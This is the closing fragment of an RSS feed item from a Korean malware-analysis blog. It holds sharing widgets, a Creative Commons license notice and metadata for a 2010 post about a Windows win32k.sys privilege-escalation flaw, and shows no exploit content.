		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/124&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x06 vulnerability</category>
			<category>bypassing UAC</category>
			<category>win32k.sys</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/124</guid>
			<comments>http://malwarelab.tistory.com/entry/Privilege-escalation-0-day-in-almost-all-Windows-versions#entry124comment</comments>
			<pubDate>Thu, 25 Nov 2010 11:10:32 +0900</pubDate>
		</item>
	</channel>
</rss>
